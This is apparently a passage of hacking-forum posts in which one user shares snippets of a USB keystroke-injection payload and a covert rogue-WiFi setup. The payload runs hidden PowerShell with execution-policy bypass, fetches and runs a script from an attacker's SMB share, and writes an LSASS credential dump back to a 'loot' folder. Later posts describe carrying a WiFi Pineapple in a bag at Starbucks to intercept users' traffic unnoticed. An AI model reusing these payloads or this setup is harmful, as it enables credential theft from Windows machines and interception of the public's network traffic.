MaxDamage

Yes that is what I did: here are some snippets from the payload I am working on: In Payload.txt, do not forget to install tools... /pentest/impacket/examples/smbserver.py -comment '...' b /loot/dump QUACK STRING "powershell -WindowStyle Hidden -NoLogo -Exec Bypass \"while (\$true) { If (Test-Connection 172.16.64.1 -count 1) { \\\172.16.64.1\b\run.ps1; exit } }\"" In my powershell script 'Run.ps1': #Wait for SMB to get going while (!(Test-Path "\\172.16.64.1\b\udisk\loot\LSASDump\")){ Start-Sleep 2 $I++ if ($I -eq 10) {break} # dont wait too long..... } # Loot Directory [String]$p = '\\172.16.64.1\b\udisk\loot\LSASDump\' if (!(Test-Path $P)) {New-Item -Path $P -type directory | Out-Null} I haven't published as I am still testing but these should help.

I have used the python SMB server like Darren did in the SMB_Exfil payload and then used Powershell to pull the file or run direct from the SMB share.

Nice, Next week we should know when they ship. It is probably going to be end of Jan now. The B board is on its way to the UK as we speak :). MaxDamage

Just a thought, How about a rasbery pi running ARM BT5 ........

I am doing somthing like that and it works briliently. Happy to help if I can? This is my setup: Internet <---- GSM----<Nexus One(as AP)<----(Wifi)-----PC (Samsung Q1)<-----(Eth)----Pineapple<----Noobs I have the ap51 and Q1 in my bag. ap51 powerd from the q1. Then I rdp into backtrak on the q1 from my laptop using RDP in windowz and xrdp on ubuntu (bt5 r1). No cables at all, works like a dreem with no suspicious looks. I get about 4 hours from one charge. Only problem I have just now is getting routing (forwarding) to work in star bucks. but mos other places work. Evan got it working via WPA routers. Let me know if you need help. MaxDamage